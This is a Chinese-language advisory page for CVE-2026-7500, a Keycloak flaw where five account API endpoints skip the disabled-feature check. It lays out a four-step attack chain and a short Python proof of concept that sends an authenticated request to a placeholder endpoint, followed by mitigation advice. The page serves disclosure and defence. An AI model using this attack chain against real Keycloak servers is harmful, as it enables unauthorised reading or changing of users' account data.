CVE-2026-7500 CVSS 5.4 中危

CVE-2026-7500 Keycloak账户API禁用绕过漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7500

漏洞类型

权限绕过

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Keycloak

漏洞概述

该漏洞存在于Keycloak身份认证服务中。当管理员配置 `--features-disabled=account,account-api` 试图禁用账户REST API时，由于代码逻辑缺陷，`/account/v1alpha1` 路径下的五个特定端点未包含 `checkAccountApiEnabled()` 检查。这导致即便功能被标记为禁用，拥有低权限的用户仍可访问这些端点并执行读写操作，从而绕过安全限制。

技术细节

漏洞根因在于Keycloak REST服务类中的安全门控机制不一致。在 `--features-disabled=account,account-api` 启动模式下，系统依赖 `checkAccountApiEnabled()` 方法拦截请求。然而，`/account/v1alpha1` 下的五个端点（如某些读写接口）遗漏了此调用，而同类的其他四个端点则正确实现了该拦截。攻击者只需拥有有效的低权限账户凭证（PR:L），即可直接构造HTTP请求访问这些“遗漏”的端点。利用该漏洞，攻击者可以读取敏感账户信息或篡改用户设置，违反了管理员设定的最小权限原则和功能禁用策略。

攻击链分析

STEP 1

信息收集

攻击者识别目标系统运行了Keycloak，并推测其可能禁用了账户API功能。

STEP 2

获取凭证

攻击者通过注册或社会工程学获取一个合法的低权限用户账户及对应的Access Token。

STEP 3

发送探测请求

攻击者构造HTTP请求，直接访问 `/account/v1alpha1` 路径下的特定端点，并在Header中携带Token。

STEP 4

执行操作

由于服务端缺少 `checkAccountApiEnabled()` 检查，请求被成功处理，攻击者读取或修改了数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_host = "http://keycloak-target:8080"
realm = "master"
endpoint_path = "/realms/master/account/v1alpha1/some-exposed-endpoint" # The specific endpoint that lacks the check
url = f"{target_host}{endpoint_path}"

# Attacker requires a valid low-privilege access token
access_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."

headers = {
    "Authorization": f"Bearer {access_token}",
    "Content-Type": "application/json"
}

try:
    # Attempt to access the supposedly disabled API
    response = requests.get(url, headers=headers)
    
    if response.status_code == 200:
        print("[+] Vulnerability Confirmed!")
        print("[+] Data retrieved from disabled endpoint:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"Error: {e}")

影响范围

Keycloak (具体受影响版本请参考官方安全通告)

防御指南

临时缓解措施

建议在升级修复前，通过网络ACL或WAF规则严格限制对 `/account/v1alpha1` 路径的访问权限，仅允许可信IP访问，并加强对低权限用户行为的审计。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7500
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7500
3 Details https://www.cvedetails.com/cve/CVE-2026-7500/
4 VulDB https://vuldb.com/cve/CVE-2026-7500
5 Link https://access.redhat.com/security/cve/CVE-2026-7500
6 Link https://bugzilla.redhat.com/show_bug.cgi?id=2464126

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表